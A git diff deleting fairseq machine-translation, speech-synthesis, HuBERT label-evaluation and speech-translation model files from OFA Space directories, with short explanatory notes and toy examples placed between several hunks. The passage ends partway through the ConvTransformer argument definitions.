- def __init__(self, cfg: TranslationConfig, src_dict, tgt_dict):
- super().__init__(cfg)
- self.src_dict = src_dict
- self.tgt_dict = tgt_dict
-
- @classmethod
- def setup_task(cls, cfg: TranslationConfig, **kwargs):
- """Setup the task (e.g., load dictionaries).
-
- Args:
- args (argparse.Namespace): parsed command-line arguments
- """
-
- paths = utils.split_paths(cfg.data)
- assert len(paths) > 0
- # find language pair automatically
- if cfg.source_lang is None or cfg.target_lang is None:
- cfg.source_lang, cfg.target_lang = data_utils.infer_language_pair(paths[0])
- if cfg.source_lang is None or cfg.target_lang is None:
- raise Exception(
- "Could not infer language pair, please provide it explicitly"
- )
-
- # load dictionaries
- src_dict = cls.load_dictionary(
- os.path.join(paths[0], "dict.{}.txt".format(cfg.source_lang))
- )
- tgt_dict = cls.load_dictionary(
- os.path.join(paths[0], "dict.{}.txt".format(cfg.target_lang))
- )
- assert src_dict.pad() == tgt_dict.pad()
- assert src_dict.eos() == tgt_dict.eos()
- assert src_dict.unk() == tgt_dict.unk()
- logger.info("[{}] dictionary: {} types".format(cfg.source_lang, len(src_dict)))
- logger.info("[{}] dictionary: {} types".format(cfg.target_lang, len(tgt_dict)))
-
- return cls(cfg, src_dict, tgt_dict)
-
- def load_dataset(self, split, epoch=1, combine=False, **kwargs):
- """Load a given dataset split.
-
- Args:
- split (str): name of the split (e.g., train, valid, test)
- """
- paths = utils.split_paths(self.cfg.data)
- assert len(paths) > 0
- if split != self.cfg.train_subset:
- # if not training data set, use the first shard for valid and test
- paths = paths[:1]
- data_path = paths[(epoch - 1) % len(paths)]
-
- # infer langcode
- src, tgt = self.cfg.source_lang, self.cfg.target_lang
-
- self.datasets[split] = load_langpair_dataset(
- data_path,
- split,
- src,
- self.src_dict,
- tgt,
- self.tgt_dict,
- combine=combine,
- dataset_impl=self.cfg.dataset_impl,
- upsample_primary=self.cfg.upsample_primary,
- left_pad_source=self.cfg.left_pad_source,
- left_pad_target=self.cfg.left_pad_target,
- max_source_positions=self.cfg.max_source_positions,
- max_target_positions=self.cfg.max_target_positions,
- load_alignments=self.cfg.load_alignments,
- truncate_source=self.cfg.truncate_source,
- num_buckets=self.cfg.num_batch_buckets,
- shuffle=(split != "test"),
- pad_to_multiple=self.cfg.required_seq_len_multiple,
- )
-
- def build_dataset_for_inference(self, src_tokens, src_lengths, constraints=None):
- return LanguagePairDataset(
- src_tokens,
- src_lengths,
- self.source_dictionary,
- tgt_dict=self.target_dictionary,
- constraints=constraints,
- )
-
- def build_model(self, cfg):
- model = super().build_model(cfg)
- if self.cfg.eval_bleu:
- detok_args = json.loads(self.cfg.eval_bleu_detok_args)
- self.tokenizer = encoders.build_tokenizer(
- Namespace(tokenizer=self.cfg.eval_bleu_detok, **detok_args)
- )
-
- gen_args = json.loads(self.cfg.eval_bleu_args)
- self.sequence_generator = self.build_generator(
- [model], Namespace(**gen_args)
- )
- return model
-
- def valid_step(self, sample, model, criterion):
- loss, sample_size, logging_output = super().valid_step(sample, model, criterion)
- if self.cfg.eval_bleu:
- bleu = self._inference_with_bleu(self.sequence_generator, sample, model)
- logging_output["_bleu_sys_len"] = bleu.sys_len
- logging_output["_bleu_ref_len"] = bleu.ref_len
- # we split counts into separate entries so that they can be
- # summed efficiently across workers using fast-stat-sync
- assert len(bleu.counts) == EVAL_BLEU_ORDER
- for i in range(EVAL_BLEU_ORDER):
- logging_output["_bleu_counts_" + str(i)] = bleu.counts[i]
- logging_output["_bleu_totals_" + str(i)] = bleu.totals[i]
- return loss, sample_size, logging_output
-
- def reduce_metrics(self, logging_outputs, criterion):
- super().reduce_metrics(logging_outputs, criterion)
- if self.cfg.eval_bleu:
-
- def sum_logs(key):
- import torch
- result = sum(log.get(key, 0) for log in logging_outputs)
- if torch.is_tensor(result):
- result = result.cpu()
- return result
-
- counts, totals = [], []
- for i in range(EVAL_BLEU_ORDER):
- counts.append(sum_logs("_bleu_counts_" + str(i)))
- totals.append(sum_logs("_bleu_totals_" + str(i)))
-
- if max(totals) > 0:
- # log counts as numpy arrays -- log_scalar will sum them correctly
- metrics.log_scalar("_bleu_counts", np.array(counts))
- metrics.log_scalar("_bleu_totals", np.array(totals))
- metrics.log_scalar("_bleu_sys_len", sum_logs("_bleu_sys_len"))
- metrics.log_scalar("_bleu_ref_len", sum_logs("_bleu_ref_len"))
-
- def compute_bleu(meters):
- import inspect
- try:
- from sacrebleu.metrics import BLEU
- comp_bleu = BLEU.compute_bleu
- except ImportError:
- # compatibility API for sacrebleu 1.x
- import sacrebleu
- comp_bleu = sacrebleu.compute_bleu
-
- fn_sig = inspect.getfullargspec(comp_bleu)[0]
- if "smooth_method" in fn_sig:
- smooth = {"smooth_method": "exp"}
- else:
- smooth = {"smooth": "exp"}
- bleu = comp_bleu(
- correct=meters["_bleu_counts"].sum,
- total=meters["_bleu_totals"].sum,
- sys_len=meters["_bleu_sys_len"].sum,
- ref_len=meters["_bleu_ref_len"].sum,
- **smooth
- )
- return round(bleu.score, 2)
-
- metrics.log_derived("bleu", compute_bleu)
-
- def max_positions(self):
- """Return the max sentence length allowed by the task."""
- return (self.cfg.max_source_positions, self.cfg.max_target_positions)
-
- @property
- def source_dictionary(self):
- """Return the source :class:`~fairseq.data.Dictionary`."""
- return self.src_dict
-
- @property
- def target_dictionary(self):
- """Return the target :class:`~fairseq.data.Dictionary`."""
- return self.tgt_dict
-
- def _inference_with_bleu(self, generator, sample, model):
- import sacrebleu
-
- def decode(toks, escape_unk=False):
- s = self.tgt_dict.string(
- toks.int().cpu(),
- self.cfg.eval_bleu_remove_bpe,
- # The default unknown string in fairseq is `<unk>`, but
- # this is tokenized by sacrebleu as `< unk >`, inflating
- # BLEU scores. Instead, we use a somewhat more verbose
- # alternative that is unlikely to appear in the real
- # reference, but doesn't get split into multiple tokens.
- unk_string=("UNKNOWNTOKENINREF" if escape_unk else "UNKNOWNTOKENINHYP"),
- )
- if self.tokenizer:
- s = self.tokenizer.decode(s)
- return s
-
- gen_out = self.inference_step(generator, [model], sample, prefix_tokens=None)
- hyps, refs = [], []
- for i in range(len(gen_out)):
- hyps.append(decode(gen_out[i][0]["tokens"]))
- refs.append(
- decode(
- utils.strip_pad(sample["target"][i], self.tgt_dict.pad()),
- escape_unk=True, # don't count as matches to the hypo
- )
- )
- if self.cfg.eval_bleu_print_samples:
- logger.info("example hypothesis: " + hyps[0])
- logger.info("example reference: " + refs[0])
- if self.cfg.eval_tokenized_bleu:
- return sacrebleu.corpus_bleu(hyps, [refs], tokenize="none")
- else:
- return sacrebleu.corpus_bleu(hyps, [refs])
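The validation path above ultimately hands detokenized hypothesis/reference strings to `sacrebleu.corpus_bleu`, and later re-aggregates the returned n-gram counts across workers. A self-contained example of that call with toy (invented) sentences:

import sacrebleu

hyps = ["the cat sat on the mat", "hello world"]
refs = ["the cat is on the mat", "hello world"]

# sacrebleu expects a list of reference *streams*, hence the extra list around refs.
bleu = sacrebleu.corpus_bleu(hyps, [refs])
print(round(bleu.score, 2))
print(bleu.counts, bleu.totals, bleu.sys_len, bleu.ref_len)  # the fields logged above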
diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/speech_generator.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/speech_generator.py
deleted file mode 100644
index 8086e34d2b56fa808d0905b1a00e87e6736fcf04..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/speech_generator.py
+++ /dev/null
@@ -1,219 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-import torch
-import numpy as np
-
-from fairseq.data.audio.speech_to_text_dataset import S2TDataConfig
-
-
-class SpeechGenerator(object):
- def __init__(self, model, vocoder, data_cfg: S2TDataConfig):
- self.model = model
- self.vocoder = vocoder
- stats_npz_path = data_cfg.global_cmvn_stats_npz
- self.gcmvn_stats = None
- if stats_npz_path is not None:
- self.gcmvn_stats = np.load(stats_npz_path)
-
- def gcmvn_denormalize(self, x):
- # x: B x T x C
- if self.gcmvn_stats is None:
- return x
- mean = torch.from_numpy(self.gcmvn_stats["mean"]).to(x)
- std = torch.from_numpy(self.gcmvn_stats["std"]).to(x)
- assert len(x.shape) == 3 and mean.shape[0] == std.shape[0] == x.shape[2]
- x = x * std.view(1, 1, -1).expand_as(x)
- return x + mean.view(1, 1, -1).expand_as(x)
-
- def get_waveform(self, feat):
- # T x C -> T
- return None if self.vocoder is None else self.vocoder(feat).squeeze(0)
-
-
-class AutoRegressiveSpeechGenerator(SpeechGenerator):
- def __init__(
- self, model, vocoder, data_cfg, max_iter: int = 6000,
- eos_prob_threshold: float = 0.5,
- ):
- super().__init__(model, vocoder, data_cfg)
- self.max_iter = max_iter
- self.eos_prob_threshold = eos_prob_threshold
-
- @torch.no_grad()
- def generate(self, model, sample, has_targ=False, **kwargs):
- model.eval()
-
- src_tokens = sample["net_input"]["src_tokens"]
- src_lengths = sample["net_input"]["src_lengths"]
- bsz, src_len = src_tokens.size()
- n_frames_per_step = model.decoder.n_frames_per_step
- out_dim = model.decoder.out_dim
- raw_dim = out_dim // n_frames_per_step
-
- # initialize
- encoder_out = model.forward_encoder(src_tokens, src_lengths,
- speaker=sample["speaker"])
- incremental_state = {}
- feat, attn, eos_prob = [], [], []
- finished = src_tokens.new_zeros((bsz,)).bool()
- out_lens = src_lengths.new_zeros((bsz,)).long().fill_(self.max_iter)
-
- prev_feat_out = encoder_out["encoder_out"][0].new_zeros(bsz, 1, out_dim)
- for step in range(self.max_iter):
- cur_out_lens = out_lens.clone()
- cur_out_lens.masked_fill_(cur_out_lens.eq(self.max_iter), step + 1)
- _, cur_eos_out, cur_extra = model.forward_decoder(
- prev_feat_out, encoder_out=encoder_out,
- incremental_state=incremental_state,
- target_lengths=cur_out_lens, speaker=sample["speaker"], **kwargs
- )
- cur_eos_prob = torch.sigmoid(cur_eos_out).squeeze(2)
- feat.append(cur_extra['feature_out'])
- attn.append(cur_extra['attn'])
- eos_prob.append(cur_eos_prob)
-
- cur_finished = (cur_eos_prob.squeeze(1) > self.eos_prob_threshold)
- out_lens.masked_fill_((~finished) & cur_finished, step + 1)
- finished = finished | cur_finished
- if finished.sum().item() == bsz:
- break
- prev_feat_out = cur_extra['feature_out']
-
- feat = torch.cat(feat, dim=1)
- feat = model.decoder.postnet(feat) + feat
- eos_prob = torch.cat(eos_prob, dim=1)
- attn = torch.cat(attn, dim=2)
- alignment = attn.max(dim=1)[1]
-
- feat = feat.reshape(bsz, -1, raw_dim)
- feat = self.gcmvn_denormalize(feat)
-
- eos_prob = eos_prob.repeat_interleave(n_frames_per_step, dim=1)
- attn = attn.repeat_interleave(n_frames_per_step, dim=2)
- alignment = alignment.repeat_interleave(n_frames_per_step, dim=1)
- out_lens = out_lens * n_frames_per_step
-
- finalized = [
- {
- 'feature': feat[b, :out_len],
- 'eos_prob': eos_prob[b, :out_len],
- 'attn': attn[b, :, :out_len],
- 'alignment': alignment[b, :out_len],
- 'waveform': self.get_waveform(feat[b, :out_len]),
- }
- for b, out_len in zip(range(bsz), out_lens)
- ]
-
- if has_targ:
- assert sample["target"].size(-1) == out_dim
- tgt_feats = sample["target"].view(bsz, -1, raw_dim)
- tgt_feats = self.gcmvn_denormalize(tgt_feats)
- tgt_lens = sample["target_lengths"] * n_frames_per_step
- for b, (f, l) in enumerate(zip(tgt_feats, tgt_lens)):
- finalized[b]["targ_feature"] = f[:l]
- finalized[b]["targ_waveform"] = self.get_waveform(f[:l])
- return finalized
-
-
-class NonAutoregressiveSpeechGenerator(SpeechGenerator):
- @torch.no_grad()
- def generate(self, model, sample, has_targ=False, **kwargs):
- model.eval()
-
- bsz, max_src_len = sample["net_input"]["src_tokens"].size()
- n_frames_per_step = model.encoder.n_frames_per_step
- out_dim = model.encoder.out_dim
- raw_dim = out_dim // n_frames_per_step
-
- feat, out_lens, log_dur_out, _, _ = model(
- src_tokens=sample["net_input"]["src_tokens"],
- src_lengths=sample["net_input"]["src_lengths"],
- prev_output_tokens=sample["net_input"]["prev_output_tokens"],
- incremental_state=None,
- target_lengths=sample["target_lengths"],
- speaker=sample["speaker"]
- )
-
- feat = feat.view(bsz, -1, raw_dim)
- feat = self.gcmvn_denormalize(feat)
-
- dur_out = torch.clamp(
- torch.round(torch.exp(log_dur_out) - 1).long(), min=0
- )
-
- def get_dur_plot_data(d):
- r = []
- for i, dd in enumerate(d):
- r += [i + 1] * dd.item()
- return r
-
- out_lens = out_lens * n_frames_per_step
- finalized = [
- {
- 'feature': feat[b, :l] if l > 0 else feat.new_zeros([1, raw_dim]),
- 'waveform': self.get_waveform(
- feat[b, :l] if l > 0 else feat.new_zeros([1, raw_dim])
- ),
- 'attn': feat.new_tensor(get_dur_plot_data(dur_out[b])),
- }
- for b, l in zip(range(bsz), out_lens)
- ]
-
- if has_targ:
- tgt_feats = sample["target"].view(bsz, -1, raw_dim)
- tgt_feats = self.gcmvn_denormalize(tgt_feats)
- tgt_lens = sample["target_lengths"] * n_frames_per_step
- for b, (f, l) in enumerate(zip(tgt_feats, tgt_lens)):
- finalized[b]["targ_feature"] = f[:l]
- finalized[b]["targ_waveform"] = self.get_waveform(f[:l])
- return finalized
-
-
-class TeacherForcingAutoRegressiveSpeechGenerator(AutoRegressiveSpeechGenerator):
- @torch.no_grad()
- def generate(self, model, sample, has_targ=False, **kwargs):
- model.eval()
-
- src_tokens = sample["net_input"]["src_tokens"]
- src_lens = sample["net_input"]["src_lengths"]
- prev_out_tokens = sample["net_input"]["prev_output_tokens"]
- tgt_lens = sample["target_lengths"]
- n_frames_per_step = model.decoder.n_frames_per_step
- raw_dim = model.decoder.out_dim // n_frames_per_step
- bsz = src_tokens.shape[0]
-
- feat, eos_prob, extra = model(
- src_tokens, src_lens, prev_out_tokens, incremental_state=None,
- target_lengths=tgt_lens, speaker=sample["speaker"]
- )
-
- attn = extra["attn"] # B x T_s x T_t
- alignment = attn.max(dim=1)[1]
- feat = feat.reshape(bsz, -1, raw_dim)
- feat = self.gcmvn_denormalize(feat)
- eos_prob = eos_prob.repeat_interleave(n_frames_per_step, dim=1)
- attn = attn.repeat_interleave(n_frames_per_step, dim=2)
- alignment = alignment.repeat_interleave(n_frames_per_step, dim=1)
- tgt_lens = sample["target_lengths"] * n_frames_per_step
-
- finalized = [
- {
- 'feature': feat[b, :tgt_len],
- 'eos_prob': eos_prob[b, :tgt_len],
- 'attn': attn[b, :, :tgt_len],
- 'alignment': alignment[b, :tgt_len],
- 'waveform': self.get_waveform(feat[b, :tgt_len]),
- }
- for b, tgt_len in zip(range(bsz), tgt_lens)
- ]
-
- if has_targ:
- tgt_feats = sample["target"].view(bsz, -1, raw_dim)
- tgt_feats = self.gcmvn_denormalize(tgt_feats)
- for b, (f, l) in enumerate(zip(tgt_feats, tgt_lens)):
- finalized[b]["targ_feature"] = f[:l]
- finalized[b]["targ_waveform"] = self.get_waveform(f[:l])
- return finalized
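`gcmvn_denormalize()` above undoes global cepstral mean-variance normalization by broadcasting the stored std and mean back over a (batch, time, channel) feature tensor. A toy round trip showing the same broadcasting; shapes and values are arbitrary.

import torch

B, T, C = 2, 5, 3
feats = torch.randn(B, T, C)
mean, std = feats.mean(dim=(0, 1)), feats.std(dim=(0, 1))          # per-channel statistics

normalized = (feats - mean) / std
restored = normalized * std.view(1, 1, -1) + mean.view(1, 1, -1)   # as in gcmvn_denormalize
print(torch.allclose(restored, feats, atol=1e-5))                  # True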
diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/tasks/frm_text_to_speech.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/tasks/frm_text_to_speech.py
deleted file mode 100644
index 1fa9b0f83e742aefce764e2858a81f99db911afd..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/tasks/frm_text_to_speech.py
+++ /dev/null
@@ -1,56 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-import logging
-
-from fairseq.data.audio.frm_text_to_speech_dataset import FrmTextToSpeechDatasetCreator
-from fairseq.tasks import register_task
-from fairseq.tasks.text_to_speech import TextToSpeechTask
-
-
-logging.basicConfig(
- format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
- datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO
-)
-logger = logging.getLogger(__name__)
-
-
-@register_task('frm_text_to_speech')
-class FrmTextToSpeechTask(TextToSpeechTask):
- @staticmethod
- def add_args(parser):
- TextToSpeechTask.add_args(parser)
- parser.add_argument(
- "--do_chunk", action="store_true", help="train on chunks"
- )
- parser.add_argument("--chunk_bound", default=-1, type=int)
- parser.add_argument("--chunk_init", default=50, type=int)
- parser.add_argument("--chunk_incr", default=5, type=int)
- parser.add_argument("--add_eos", action="store_true")
- parser.add_argument("--dedup", action="store_true")
- parser.add_argument("--ref_fpu", default=-1, type=float)
-
- def load_dataset(self, split, **unused_kwargs):
- is_train_split = split.startswith("train")
- pre_tokenizer = self.build_tokenizer(self.args)
- bpe_tokenizer = self.build_bpe(self.args)
- self.datasets[split] = FrmTextToSpeechDatasetCreator.from_tsv(
- self.args.data,
- self.data_cfg,
- split,
- self.src_dict,
- pre_tokenizer,
- bpe_tokenizer,
- is_train_split=is_train_split,
- n_frames_per_step=self.args.n_frames_per_step,
- speaker_to_id=self.speaker_to_id,
- do_chunk=self.args.do_chunk,
- chunk_bound=self.args.chunk_bound,
- chunk_init=self.args.chunk_init,
- chunk_incr=self.args.chunk_incr,
- add_eos=self.args.add_eos,
- dedup=self.args.dedup,
- ref_fpu=self.args.ref_fpu
- )
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/hubert/measure_teacher_quality.py b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/hubert/measure_teacher_quality.py
deleted file mode 100644
index 92279b2214bb2ba4a99aea92098907ef4f55821b..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/hubert/measure_teacher_quality.py
+++ /dev/null
@@ -1,241 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-import numpy as np
-import os.path as op
-import re
-from tabulate import tabulate
-from collections import Counter
-
-
-def comp_purity(p_xy, axis):
- max_p = p_xy.max(axis=axis)
- marg_p = p_xy.sum(axis=axis)
- indv_pur = max_p / marg_p
- aggr_pur = max_p.sum()
- return indv_pur, aggr_pur
-
-
-def comp_entropy(p):
- return (-p * np.log(p + 1e-8)).sum()
-
-
-def comp_norm_mutual_info(p_xy):
- p_x = p_xy.sum(axis=1, keepdims=True)
- p_y = p_xy.sum(axis=0, keepdims=True)
- pmi = np.log(p_xy / np.matmul(p_x, p_y) + 1e-8)
- mi = (p_xy * pmi).sum()
- h_x = comp_entropy(p_x)
- h_y = comp_entropy(p_y)
- return mi, mi / h_x, mi / h_y, h_x, h_y
-
-
-def pad(labs, n):
- if n == 0:
- return np.array(labs)
- return np.concatenate([[labs[0]] * n, labs, [labs[-1]] * n])
-
-
-def comp_avg_seg_dur(labs_list):
- n_frms = 0
- n_segs = 0
- for labs in labs_list:
- labs = np.array(labs)
- edges = np.zeros(len(labs)).astype(bool)
- edges[0] = True
- edges[1:] = labs[1:] != labs[:-1]
- n_frms += len(edges)
- n_segs += edges.astype(int).sum()
- return n_frms / n_segs
-
-
-def comp_joint_prob(uid2refs, uid2hyps):
- """
- Build the joint probability table p(ref, hyp) over frame-aligned reference
- and hypothesis labels, skipping utterances that are missing from uid2hyps.
- """
- cnts = Counter()
- skipped = []
- abs_frmdiff = 0
- for uid in uid2refs:
- if uid not in uid2hyps:
- skipped.append(uid)
- continue
- refs = uid2refs[uid]
- hyps = uid2hyps[uid]
- abs_frmdiff += abs(len(refs) - len(hyps))
- min_len = min(len(refs), len(hyps))
- refs = refs[:min_len]
- hyps = hyps[:min_len]
- cnts.update(zip(refs, hyps))
- tot = sum(cnts.values())
-
- ref_set = sorted({ref for ref, _ in cnts.keys()})
- hyp_set = sorted({hyp for _, hyp in cnts.keys()})
- ref2pid = dict(zip(ref_set, range(len(ref_set))))
- hyp2lid = dict(zip(hyp_set, range(len(hyp_set))))
- # print(hyp_set)
- p_xy = np.zeros((len(ref2pid), len(hyp2lid)), dtype=float)
- for (ref, hyp), cnt in cnts.items():
- p_xy[ref2pid[ref], hyp2lid[hyp]] = cnt
- p_xy /= p_xy.sum()
- return p_xy, ref2pid, hyp2lid, tot, abs_frmdiff, skipped
-
-
-def read_phn(tsv_path, rm_stress=True):
- uid2phns = {}
- with open(tsv_path) as f:
- for line in f:
- uid, phns = line.rstrip().split("\t")
- phns = phns.split(",")
- if rm_stress:
- phns = [re.sub("[0-9]", "", phn) for phn in phns]
- uid2phns[uid] = phns
- return uid2phns
-
-
-def read_lab(tsv_path, lab_path, pad_len=0, upsample=1):
- """
- tsv is needed to retrieve the uids for the labels
- """
- with open(tsv_path) as f:
- f.readline()
- uids = [op.splitext(op.basename(line.rstrip().split()[0]))[0] for line in f]
- with open(lab_path) as f:
- labs_list = [pad(line.rstrip().split(), pad_len).repeat(upsample) for line in f]
- assert len(uids) == len(labs_list)
- return dict(zip(uids, labs_list))
-
-
-def main_lab_lab(
- tsv_dir,
- lab_dir,
- lab_name,
- lab_sets,
- ref_dir,
- ref_name,
- pad_len=0,
- upsample=1,
- verbose=False,
-):
- # assume tsv_dir is the same for both the reference and the hypotheses
- tsv_dir = lab_dir if tsv_dir is None else tsv_dir
-
- uid2refs = {}
- for s in lab_sets:
- uid2refs.update(read_lab(f"{tsv_dir}/{s}.tsv", f"{ref_dir}/{s}.{ref_name}"))
-
- uid2hyps = {}
- for s in lab_sets:
- uid2hyps.update(
- read_lab(
- f"{tsv_dir}/{s}.tsv", f"{lab_dir}/{s}.{lab_name}", pad_len, upsample
- )
- )
- _main(uid2refs, uid2hyps, verbose)
-
-
-def main_phn_lab(
- tsv_dir,
- lab_dir,
- lab_name,
- lab_sets,
- phn_dir,
- phn_sets,
- pad_len=0,
- upsample=1,
- verbose=False,
-):
- uid2refs = {}
- for s in phn_sets:
- uid2refs.update(read_phn(f"{phn_dir}/{s}.tsv"))
-
- uid2hyps = {}
- tsv_dir = lab_dir if tsv_dir is None else tsv_dir
- for s in lab_sets:
- uid2hyps.update(
- read_lab(
- f"{tsv_dir}/{s}.tsv", f"{lab_dir}/{s}.{lab_name}", pad_len, upsample
- )
- )
- _main(uid2refs, uid2hyps, verbose)
-
-
-def _main(uid2refs, uid2hyps, verbose):
- (p_xy, ref2pid, hyp2lid, tot, frmdiff, skipped) = comp_joint_prob(
- uid2refs, uid2hyps
- )
- ref_pur_by_hyp, ref_pur = comp_purity(p_xy, axis=0)
- hyp_pur_by_ref, hyp_pur = comp_purity(p_xy, axis=1)
- (mi, mi_norm_by_ref, mi_norm_by_hyp, h_ref, h_hyp) = comp_norm_mutual_info(p_xy)
- outputs = {
- "ref pur": ref_pur,
- "hyp pur": hyp_pur,
- "H(ref)": h_ref,
- "H(hyp)": h_hyp,
- "MI": mi,
- "MI/H(ref)": mi_norm_by_ref,
- "ref segL": comp_avg_seg_dur(uid2refs.values()),
- "hyp segL": comp_avg_seg_dur(uid2hyps.values()),
- "p_xy shape": p_xy.shape,
- "frm tot": tot,
- "frm diff": frmdiff,
- "utt tot": len(uid2refs),
- "utt miss": len(skipped),
- }
- print(tabulate([outputs.values()], outputs.keys(), floatfmt=".4f"))
-
-
-if __name__ == "__main__":
- """
- Compute the quality of labels with respect to phone transcripts, or to another label set if provided.
- """
- import argparse
-
- parser = argparse.ArgumentParser()
- parser.add_argument("tsv_dir")
- parser.add_argument("lab_dir")
- parser.add_argument("lab_name")
- parser.add_argument("--lab_sets", default=["valid"], type=str, nargs="+")
- parser.add_argument(
- "--phn_dir",
- default="/checkpoint/wnhsu/data/librispeech/960h/fa/raw_phn/phone_frame_align_v1",
- )
- parser.add_argument(
- "--phn_sets", default=["dev-clean", "dev-other"], type=str, nargs="+"
- )
- parser.add_argument("--pad_len", default=0, type=int, help="padding for hypotheses")
- parser.add_argument(
- "--upsample", default=1, type=int, help="upsample factor for hypotheses"
- )
- parser.add_argument("--ref_lab_dir", default="")
- parser.add_argument("--ref_lab_name", default="")
- parser.add_argument("--verbose", action="store_true")
- args = parser.parse_args()
-
- if args.ref_lab_dir and args.ref_lab_name:
- main_lab_lab(
- args.tsv_dir,
- args.lab_dir,
- args.lab_name,
- args.lab_sets,
- args.ref_lab_dir,
- args.ref_lab_name,
- args.pad_len,
- args.upsample,
- args.verbose,
- )
- else:
- main_phn_lab(
- args.tsv_dir,
- args.lab_dir,
- args.lab_name,
- args.lab_sets,
- args.phn_dir,
- args.phn_sets,
- args.pad_len,
- args.upsample,
- args.verbose,
- )
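The script above compares two frame-level labelings through their joint distribution p(ref, hyp): purity sums the per-row/column maxima, and the mutual information is normalized by each marginal entropy. A small numpy check of those formulas on an invented 2x2 joint table:

import numpy as np

p_xy = np.array([[0.4, 0.1],
                 [0.1, 0.4]])              # toy joint distribution over (ref, hyp)

ref_pur = p_xy.max(axis=0).sum()           # mirrors comp_purity(p_xy, axis=0)
hyp_pur = p_xy.max(axis=1).sum()           # mirrors comp_purity(p_xy, axis=1)

def entropy(p):
    return float(-(p * np.log(p + 1e-8)).sum())

p_x = p_xy.sum(axis=1, keepdims=True)
p_y = p_xy.sum(axis=0, keepdims=True)
mi = float((p_xy * np.log(p_xy / (p_x @ p_y) + 1e-8)).sum())

print(ref_pur, hyp_pur, mi / entropy(p_x), mi / entropy(p_y))  # 0.8 0.8 ~0.28 ~0.28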
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/multilingual/train_multilingual_model.sh b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/multilingual/train_multilingual_model.sh
deleted file mode 100644
index cc050bd3f02de8a2f303737f187442d2eb80e4ef..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/multilingual/train_multilingual_model.sh
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/bin/bash
-# Copyright (c) Facebook, Inc. and its affiliates.
-# All rights reserved.
-#
-# This source code is licensed under the license found in the
-# LICENSE file in the root directory of this source tree.
-
-path_2_data=$1 # path to the data directory which contains binarized data for each direction
-lang_list=$2   # path to a file listing the languages, one per line
-lang_pairs=$3  # a list of language pairs to train multilingual models, e.g. "en-fr,en-cs,fr-en,cs-en"
-
-fairseq-train "$path_2_data" \
- --encoder-normalize-before --decoder-normalize-before \
- --arch transformer --layernorm-embedding \
- --task translation_multi_simple_epoch \
- --sampling-method "temperature" \
- --sampling-temperature 1.5 \
- --encoder-langtok "src" \
- --decoder-langtok \
- --lang-dict "$lang_list" \
- --lang-pairs "$lang_pairs" \
- --criterion label_smoothed_cross_entropy --label-smoothing 0.2 \
- --optimizer adam --adam-eps 1e-06 --adam-betas '(0.9, 0.98)' \
- --lr-scheduler inverse_sqrt --lr 3e-05 --warmup-updates 2500 --max-update 40000 \
- --dropout 0.3 --attention-dropout 0.1 --weight-decay 0.0 \
- --max-tokens 1024 --update-freq 2 \
- --save-interval 1 --save-interval-updates 5000 --keep-interval-updates 10 --no-epoch-checkpoints \
- --seed 222 --log-format simple --log-interval 2
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/speech_to_text/convtransformer.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/speech_to_text/convtransformer.py
deleted file mode 100644
index eba000d7b0826d2ecf5dc471156f8f8cc9f5e402..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/speech_to_text/convtransformer.py
+++ /dev/null
@@ -1,448 +0,0 @@
-#!/usr/bin/env python3
-
-import logging
-import math
-from typing import Dict, List, Optional, Tuple
-
-import torch
-import torch.nn as nn
-import torch.nn.functional as F
-from fairseq import checkpoint_utils, utils
-from fairseq.data.data_utils import lengths_to_padding_mask
-from fairseq.models import (
- FairseqEncoder,
- FairseqEncoderDecoderModel,
- register_model,
- register_model_architecture,
-)
-from fairseq.models.transformer import Embedding, TransformerDecoder
-from fairseq.modules import LayerNorm, PositionalEmbedding, TransformerEncoderLayer
-from torch import Tensor
-
-logger = logging.getLogger(__name__)
-
-
-@register_model("convtransformer")
-class ConvTransformerModel(FairseqEncoderDecoderModel):
- """
- Transformer-based Speech translation model from ESPNet-ST
- https://arxiv.org/abs/2004.10234
- """
-
- def __init__(self, encoder, decoder):
- super().__init__(encoder, decoder)
-
- @staticmethod
- def add_args(parser):
- """Add model-specific arguments to the parser."""
- parser.add_argument(
- "--input-feat-per-channel",
- type=int,
- metavar="N",
- help="encoder input dimension per input channel",
- )
- parser.add_argument(
- "--activation-fn",
- choices=utils.get_available_activation_fns(),
- help="activation function to use",
- )
- parser.add_argument(
- "--dropout", type=float, metavar="D", help="dropout probability"
- )
- parser.add_argument(
- "--attention-dropout",
- type=float,
- metavar="D",
- help="dropout probability for attention weights",
- )
- parser.add_argument(
- "--activation-dropout",
- "--relu-dropout",
- type=float,
- metavar="D",
- help="dropout probability after activation in FFN.",
- )
- parser.add_argument(
- "--encoder-embed-dim",
- type=int,
- metavar="N",
- help="encoder embedding dimension",
- )
- parser.add_argument(
- "--encoder-ffn-embed-dim",
- type=int,
- metavar="N",
- help="encoder embedding dimension for FFN",
- )
- parser.add_argument(
- "--encoder-layers", type=int, metavar="N", help="num encoder layers"
- )
- parser.add_argument(
- "--encoder-attention-heads",
- type=int,
- metavar="N",
- help="num encoder attention heads",
- )
- parser.add_argument(
